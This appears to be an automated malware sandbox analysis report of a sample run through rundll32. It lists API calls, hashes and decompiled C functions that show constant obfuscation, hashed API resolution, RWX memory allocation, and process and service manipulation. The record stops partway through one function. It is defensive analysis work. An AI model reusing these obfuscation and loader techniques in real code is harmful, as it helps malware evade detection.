Source File: 00000008.00000002.2334101660.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_423000_rundll32.jbxd

Similarity

API ID: Initialize
String ID: Link
API String ID: 2538663250-2526951119
Opcode ID: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
Instruction ID: d0869bd9eca08793bd1e582bf0eae279adb1ed532342e6143eed6f974ddeb4d0
Opcode Fuzzy Hash: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
Instruction Fuzzy Hash: F21194706007006FD710EF76CD82B4E77E9AF45744B54583AF800E76A1FA79A901875E

Uniqueness

Uniqueness Score: -1.00%

Function 0020EB40, Relevance: 3.3, APIs: 2, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0020EB8F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 0020EDD9

Memory Dump Source

Source File: 00000008.00000002.2333875086.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: 277043798b2cc333e83b97f6ba02c79dfe202150811d7d09766008fb6e449af7
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: 99C1B974A102099FCB48CF88C590EAEB7B5FF88304F158559E8199B392D735EE92CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00461A14, Relevance: 3.1, APIs: 2, Instructions: 56
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00461AC8: DdeFreeStringHandle.USER32(?,?), ref: 00461AE8

DdeCreateStringHandleA.USER32(?,00000000), ref: 00461A82
DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00461A95

Memory Dump Source

Source File: 00000008.00000002.2334101660.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_423000_rundll32.jbxd

Similarity

API ID: HandleString$CreateFreeNameService
String ID:
API String ID: 374373348-0
Opcode ID: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
Instruction ID: 9d8230b8b9786ad70cb23cfc8f07923e913d2bc7bc66b4dc0d7f0c12b5e74525
Opcode Fuzzy Hash: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
Instruction Fuzzy Hash: 5E1182717112545BCB11EAA5C882A4A37ACAF89B04B5405BAFD00EB296E678ED008799

Uniqueness

Uniqueness Score: -1.00%

Function 00407F4B, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00407F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				int _t43;
				WCHAR* _t46;

				_push(_a12);
				_t46 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00412550(_t35);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x71485a;
				_v28 = 0x57c810;
				_v20 = 0x2813;
				_v20 = _v20 * 0x59;
				_v20 = _v20 ^ 0x000dd428;
				_v16 = 0xdb84;
				_v16 = _v16 | 0xe2c96d38;
				_v16 = _v16 ^ 0xe2c994d7;
				_v12 = 0xc19e;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000060ae;
				_v8 = 0x265e;
				_v8 = _v8 + 0x315a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x02bd94c0;
				E00407378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
				_t43 = lstrcmpiW(_t46, _a4); // executed
				return _t43;
			}

0x00407f52
0x00407f55
0x00407f57
0x00407f5a
0x00407f5e
0x00407f5f
0x00407f64
0x00407f6b
0x00407f72
0x00407f79
0x00407f94
0x00407f97
0x00407f9e
0x00407fa5
0x00407fac
0x00407fb3
0x00407fba
0x00407fbe
0x00407fc5
0x00407fcc
0x00407fd3
0x00407fd7
0x00407feb
0x00407ff7
0x00407ffd

APIs

lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 00407FF7

Strings

ZHq, xrefs: 00407F6B

Memory Dump Source

Source File: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2334086676.0000000000420000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2334097394.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: ZHq
API String ID: 1586166983-2177431251
Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction ID: d902e23f6411a0c44fb82a2e6a8296566946c79d4f08726a750a0587d667c915
Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction Fuzzy Hash: EC110FB6C00219BBDF00DFA4C94A8DEBFB4EF04318F108589E92466241D3B95B14DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0020E620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0020E6A4

Strings

VirtualAlloc, xrefs: 0020E689, 0020E68C

Memory Dump Source

Source File: 00000008.00000002.2333875086.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: 0ab41041595deed4d8a9c6fec46115b54e56d3d6817f324601d3d00315daee03
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: 87113060D08389DAEF01DBE894097FEBFB55B21704F044498D5446B282D2BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041B86E, Relevance: 1.6, APIs: 1, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0041B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t49;
				int _t58;
				signed int _t60;
				int _t65;

				_push(_a68);
				_t65 = __ecx;
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00412550(_t49);
				_v12 = 0xd1fa;
				_t60 = 0x3c;
				_v12 = _v12 / _t60;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x00001682;
				_v20 = 0xd4c2;
				_v20 = _v20 + 0x3986;
				_v20 = _v20 ^ 0x00013905;
				_v8 = 0x8c53;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x000060d6;
				_v16 = 0x467b;
				_v16 = _v16 + 0xffff2b71;
				_v16 = _v16 ^ 0xffff105c;
				E00407378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
				return _t58;
			}

0x0041b876
0x0041b87b
0x0041b87d
0x0041b87e
0x0041b881
0x0041b884
0x0041b887
0x0041b88a
0x0041b88d
0x0041b890
0x0041b891
0x0041b892
0x0041b893
0x0041b896
0x0041b897
0x0041b89a
0x0041b89d
0x0041b8a0
0x0041b8a4
0x0041b8a5
0x0041b8aa
0x0041b8bb
0x0041b8c3
0x0041b8c6
0x0041b8ca
0x0041b8d1
0x0041b8d8
0x0041b8df
0x0041b8e6
0x0041b8ed
0x0041b8f1
0x0041b8f4
0x0041b8fb
0x0041b902
0x0041b909
0x0041b928
0x0041b942
0x0041b949

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0041B942

Memory Dump Source

Source File: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2334086676.0000000000420000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2334097394.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
Instruction ID: 356f3b95ddaaa167dd82075bba60e0d4b8753b8399a247414e87281e072a6ffd
Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
Instruction Fuzzy Hash: 1121E672800248BBDF159F95CD09CDFBF79FF89714F008158FA1466160D7B69A60DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0040471A, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t50;
				intOrPtr* _t61;
				void* _t62;
				signed int _t63;
				signed int _t64;

				E00412550(_t50);
				_v20 = 0xf336;
				_v20 = _v20 + 0x29f7;
				_v20 = _v20 ^ 0x000152a0;
				_v8 = 0xc9c4;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 << 3;
				_t63 = 0x6d;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x0000467c;
				_v16 = 0x763b;
				_t64 = 0x2d;
				_v16 = _v16 / _t63;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x000058e5;
				_v12 = 0x527e;
				_v12 = _v12 / _t64;
				_v12 = _v12 | 0xd776a7a3;
				_v12 = _v12 ^ 0xd776f938;
				_t61 = E00407378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
				return _t62;
			}

0x0040473b
0x00404740
0x0040474a
0x00404753
0x0040475a
0x00404761
0x00404765
0x0040476f
0x00404772
0x00404775
0x0040477c
0x00404788
0x00404789
0x0040478e
0x00404792
0x00404799
0x004047aa
0x004047ad
0x004047b4
0x004047d3
0x004047e4
0x004047ea

APIs

SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 004047E4

Memory Dump Source

Source File: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2334086676.0000000000420000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2334097394.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
Instruction ID: 65912959230b40fcbc033ffb5be77358307eff91cf09a66e6c6d15bb7c7ea9d8
Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
Instruction Fuzzy Hash: 27210372D01208FBEF15DFE5C94A8DEBBB5EF05354F108089E924A6250D3B99B10DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0041C0C8, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041C0C8(long __ecx, long __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, intOrPtr _a24, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t40;
				void* _t48;
				long _t52;
				long _t53;

				_t52 = __edx;
				_push(0);
				_push(_a36);
				_t53 = __ecx;
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00412550(_t40);
				_v20 = 0xb477;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 ^ 0x000000e5;
				_v16 = 0xb312;
				_v16 = _v16 + 0x2a6f;
				_v16 = _v16 ^ 0x0000d90b;
				_v12 = 0x5a0b;
				_v12 = _v12 + 0x400b;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x09a119a3;
				_v8 = 0x3388;
				_v8 = _v8 + 0x85f8;
				_v8 = _v8 * 0x5a;
				_v8 = _v8 ^ 0x00415e39;
				E00407378(__ecx, 0x81a8678d, __ecx, 0x90f109b3, 0x2bf);
				_t48 = CreateFileW(_a8, _t52, _t53, 0, _a32, _a20, 0); // executed
				return _t48;
			}

0x0041c0d3
0x0041c0d5
0x0041c0d6
0x0041c0d9
0x0041c0db
0x0041c0de
0x0041c0df
0x0041c0e2
0x0041c0e5
0x0041c0e8
0x0041c0eb
0x0041c0ee
0x0041c0f1
0x0041c0f2
0x0041c0f3
0x0041c0f8
0x0041c102
0x0041c106
0x0041c10d
0x0041c114
0x0041c11b
0x0041c122
0x0041c129
0x0041c130
0x0041c134
0x0041c13b
0x0041c142
0x0041c15d
0x0041c160
0x0041c174
0x0041c189
0x0041c191

APIs

CreateFileW.KERNEL32(0000D90B,?,D583BA2A,00000000,?,0ACC4A3C,00000000), ref: 0041C189

Memory Dump Source

Source File: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2334086676.0000000000420000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2334097394.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
Instruction ID: 96c25dcb005bf8d5b9239a355ff64305c2a40b8adff4105ffeb7b2e547fc0458
Opcode Fuzzy Hash: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
Instruction Fuzzy Hash: AF21E2B290020CBFEF019F95DD498DEBBB9EB45358F108199F92462250D7B69E24DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041340E, Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041340E(void* __ecx, void* __edx, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				void* _t45;
				void* _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(0);
				_push(0);
				E00412550(_t45);
				_v28 = 0x755cc3;
				_v24 = 0;
				_v20 = 0xc93f;
				_v20 = _v20 >> 3;
				_t59 = 0x1a;
				_v20 = _v20 / _t59;
				_v20 = _v20 ^ 0x00003660;
				_v16 = 0x16ad;
				_v16 = _v16 + 0x57a7;
				_v16 = _v16 | 0xbe0b763b;
				_v16 = _v16 ^ 0xbe0b2e9f;
				_v12 = 0xa207;
				_v12 = _v12 + 0xb6;
				_t60 = 0x37;
				_v12 = _v12 * 0x38;
				_v12 = _v12 ^ 0x0023dbd3;
				_v8 = 0xebb1;
				_v8 = _v8 / _t60;
				_v8 = _v8 | 0x19ad118e;
				_v8 = _v8 ^ 0x19ad0924;
				E00407378(_t60, 0x3e7f6fd6, _t60, 0x2daf77dd, 0x231);
				_t57 = OpenSCManagerW(0, 0, _a12); // executed
				return _t57;
			}

0x00413415
0x0041341a
0x0041341b
0x0041341e
0x00413423
0x0041342d
0x00413432
0x00413439
0x00413442
0x00413447
0x0041344c
0x00413453
0x0041345a
0x00413461
0x00413468
0x0041346f
0x00413476
0x00413481
0x0041348d
0x00413490
0x00413497
0x004134a8
0x004134ab
0x004134b2
0x004134c6
0x004134d3
0x004134d9

APIs

OpenSCManagerW.SECHOST(00000000,00000000,00003660,?,?,?,?,?,?,?,?,?,B0D9BF73), ref: 004134D3

Memory Dump Source

Source File: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2334086676.0000000000420000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2334097394.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
Instruction ID: 79fc8a61bc147dd9eb73d6e5127b7a4b6440501786f95933ed8e48a6fc7eff6b
Opcode Fuzzy Hash: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
Instruction Fuzzy Hash: 372115B1D0131DBBDB14DFA9C84A8DFBBB5FB00314F10819AE414AA240D3B55B14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00410321, Relevance: 1.6, APIs: 1, Instructions: 59
serviceCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00410321(void* __ecx, int __edx, intOrPtr _a4, intOrPtr _a8, short* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				void* _t56;
				void* _t59;
				int _t60;

				_push(_a12);
				_t60 = __edx;
				_t59 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00412550(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xc39a9;
				_v20 = 0xd5ea;
				_v20 = _v20 | 0xff6e49b2;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0xfeddf181;
				_v12 = 0x5ebb;
				_v12 = _v12 * 0x36;
				_v12 = _v12 * 0x4e;
				_v12 = _v12 | 0x0415626f;
				_v12 = _v12 ^ 0x0617d8e0;
				_v16 = 0xb467;
				_v16 = _v16 << 4;
				_v16 = _v16 * 0x58;
				_v16 = _v16 ^ 0x03e03a17;
				_v8 = 0xc80e;
				_v8 = _v8 * 5;
				_v8 = _v8 * 0x5d;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x000b2851;
				E00407378(__ecx, 0x612723fe, __ecx, 0x2daf77dd, 0x10e);
				_t56 = OpenServiceW(_t59, _a12, _t60); // executed
				return _t56;
			}

0x00410329
0x0041032c
0x0041032e
0x00410330
0x00410333
0x00410336
0x00410337
0x00410338
0x0041033d
0x00410344
0x0041034b
0x00410352
0x00410359
0x0041035c
0x00410363
0x0041037e
0x00410386
0x00410389
0x00410390
0x00410397
0x0041039e
0x004103a6
0x004103a9
0x004103b0
0x004103bb
0x004103c2
0x004103c5
0x004103c9
0x004103dc
0x004103e9
0x004103f0

APIs

OpenServiceW.SECHOST(?,FEDDF181,B0D9BF73,?,?,?,?,?,?,?,?,00000000,B0D9BF73), ref: 004103E9

Memory Dump Source

Source File: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2334086676.0000000000420000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2334097394.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
Instruction ID: c6d73ecbffe5406a28a349e9ef787ac1ab0e0a83b516e509f45a9a70e8a66525
Opcode Fuzzy Hash: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
Instruction Fuzzy Hash: 9121DFB1C01209BBDB14DFA5CA8A8DEBFB4EB45308F10819AE825B6251D3B49B54DF91

Uniqueness

Uniqueness Score: -1.00%

Function 004149CF, Relevance: 1.6, APIs: 1, Instructions: 58
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004149CF(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t52;
				struct HINSTANCE__* _t65;
				signed int _t67;
				signed int _t68;
				signed int _t69;

				_push(_a4);
				E00412550(_t52);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2e62bd;
				_v12 = 0x9175;
				_v12 = _v12 >> 3;
				_v12 = _v12 >> 4;
				_t67 = 0x72;
				_v12 = _v12 / _t67;
				_v12 = _v12 ^ 0x00007d95;
				_v20 = 0x6b8f;
				_v20 = _v20 + 0xab5d;
				_v20 = _v20 ^ 0x000118a2;
				_v16 = 0x74fd;
				_v16 = _v16 + 0xb2f4;
				_v16 = _v16 | 0x45835894;
				_v16 = _v16 ^ 0x45831718;
				_v8 = 0x475a;
				_t68 = 0x1a;
				_v8 = _v8 / _t68;
				_t69 = 0x71;
				_v8 = _v8 / _t69;
				_v8 = _v8 | 0x9a1a6af5;
				_v8 = _v8 ^ 0x9a1a601d;
				E00407378(_t69, 0xd3779e90, _t69, 0x90f109b3, 0xd8);
				_t65 = LoadLibraryW(_a4); // executed
				return _t65;
			}

0x004149d5
0x004149da
0x004149df
0x004149e6
0x004149ef
0x004149f6
0x004149fa
0x00414a03
0x00414a08
0x00414a0d
0x00414a14
0x00414a1b
0x00414a22
0x00414a29
0x00414a30
0x00414a37
0x00414a3e
0x00414a45
0x00414a4f
0x00414a54
0x00414a5c
0x00414a64
0x00414a67
0x00414a6e
0x00414a8d
0x00414a98
0x00414a9d

APIs

LoadLibraryW.KERNEL32(00007D95), ref: 00414A98

Memory Dump Source

Source File: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2334086676.0000000000420000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2334097394.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
Instruction ID: 9989af87aff6ab64ab2fd442203f787e6bef76968d5278ac6d26aaebc056c565
Opcode Fuzzy Hash: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
Instruction Fuzzy Hash: 6A2129B5E0020CFBEB04CFE5C94A9EEBBB1EB40304F10C099E518A7291D7B96B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 004141CA, Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E004141CA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t57;

				_t57 = __ecx;
				E00412550(_t42);
				_v20 = 0x33dd;
				_t53 = 0x60;
				_v20 = _v20 / _t53;
				_v20 = _v20 ^ 0x0000445b;
				_v8 = 0x98b2;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x9f0dae98;
				_v8 = _v8 + 0xffff2dd8;
				_v8 = _v8 ^ 0x9f6f2800;
				_v16 = 0x7a4d;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x630ec107;
				_v16 = _v16 ^ 0x6301fd0c;
				_v12 = 0xd3a1;
				_v12 = _v12 ^ 0x9b5a4994;
				_v12 = _v12 + 0xffffbec0;
				_v12 = _v12 ^ 0x9b5a0da8;
				_t50 = E00407378(_t53, 0x7c314b7f, _t53, 0x90f109b3, 0x1d9);
				_t51 =  *_t50(_t57, 0, _a12, 0x28, __ecx, __edx, _a4, _a8, _a12, 0, _a20, 0x28); // executed
				return _t51;
			}

0x004141d6
0x004141e5
0x004141ea
0x004141fb
0x00414203
0x00414206
0x0041420d
0x00414214
0x00414218
0x0041421f
0x00414226
0x0041422d
0x00414234
0x00414238
0x0041423f
0x00414246
0x0041424d
0x00414254
0x0041425b
0x0041427a
0x0041428a
0x00414290

APIs

SetFileInformationByHandle.KERNELBASE(0026A181,00000000,0000445B,00000028), ref: 0041428A

Memory Dump Source

Source File: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2334086676.0000000000420000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2334097394.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
Instruction ID: a3e86e75239e17fb171a25c98b6967d435d8d6a60c5aeb02e3fa6803c78aa2b8
Opcode Fuzzy Hash: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
Instruction Fuzzy Hash: 9A114A72E00309BBEB14DFA4CC4AAAEBBB5EF44714F108089E92466291D7B55B509F81

Uniqueness

Uniqueness Score: -1.00%

Function 00405AB8, Relevance: 1.6, APIs: 1, Instructions: 51
serviceCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00405AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				int _t57;
				signed int _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00412550(_t47);
				_v20 = 0xc8c;
				_v20 = _v20 + 0xffffaa04;
				_v20 = _v20 ^ 0xb702763d;
				_v20 = _v20 ^ 0x48fdd1a6;
				_v16 = 0xeb1c;
				_v16 = _v16 << 4;
				_t59 = 0xf;
				_v16 = _v16 * 0xe;
				_v16 = _v16 + 0xffff64c4;
				_v16 = _v16 ^ 0x00cd6bec;
				_v12 = 0x757;
				_v12 = _v12 ^ 0x4183b2e4;
				_v12 = _v12 << 2;
				_v12 = _v12 / _t59;
				_v12 = _v12 ^ 0x0067440e;
				_v8 = 0xa082;
				_v8 = _v8 >> 1;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xcec43627;
				_v8 = _v8 ^ 0xcec45939;
				E00407378(_t59, 0x114af6f7, _t59, 0x2daf77dd, 0x11f);
				_t57 = CloseServiceHandle(_a12); // executed
				return _t57;
			}

0x00405abe
0x00405ac1
0x00405ac4
0x00405ac9
0x00405ace
0x00405ad8
0x00405ae1
0x00405ae8
0x00405aef
0x00405af6
0x00405b00
0x00405b0b
0x00405b0e
0x00405b15
0x00405b1c
0x00405b23
0x00405b2a
0x00405b34
0x00405b37
0x00405b3e
0x00405b45
0x00405b48
0x00405b4c
0x00405b53
0x00405b6c
0x00405b77
0x00405b7c

APIs

CloseServiceHandle.SECHOST(48FDD1A6), ref: 00405B77

Memory Dump Source

Source File: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2334086676.0000000000420000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2334097394.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
Instruction ID: 1506a155f76b4c60e4096a1e21d349610d66aa9e8fe33e5f3d9433cf1ec1cd13
Opcode Fuzzy Hash: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
Instruction Fuzzy Hash: 45110371D0020DFFDB08DFA9C94A8EEBBB0FB40304F108599E925A6291D7B99B55DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040E554, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040E554(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
				signed int _v8;
